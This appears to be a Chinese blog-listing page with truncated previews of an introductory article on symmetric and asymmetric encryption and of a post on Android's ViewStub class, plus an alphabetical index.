    加密是保证数据安全的手段之一。加密是将纯文本数据转换为难以理解的密文;解密是将密文转换回纯文本。     数据的加解密属于密码学的范畴。通常,加密和解密都需要使用一些秘密信息,这些秘密信息叫做密钥,将纯文本转为密文或者转回的时候都要用到这些密钥。     对称加密指的是发送者和接收者共用同一个密钥的加解密方法。     非对称加密(又称公钥加密)指的是需要一个私有密钥一个公开密钥,两个不同的密钥的
    
                                
    • 
                                
  • Android_ViewStub
                                    阿尔萨斯
ViewStub
                                    
    public final class ViewStub extends View 
 
 
 java.lang.Object 
   
   android.view.View 
     
     android.view.ViewStub 
      
    
 
 类摘要: ViewStub 是一个隐藏的,不占用内存空间的视图对象,它可以在运行时延迟加载布局资源文件。当 ViewSt
    
                                
    • 
                

            

        

    




    

        

            按字母分类:
            ABCDEFGHIJKLMNOPQRSTUVWXYZ其他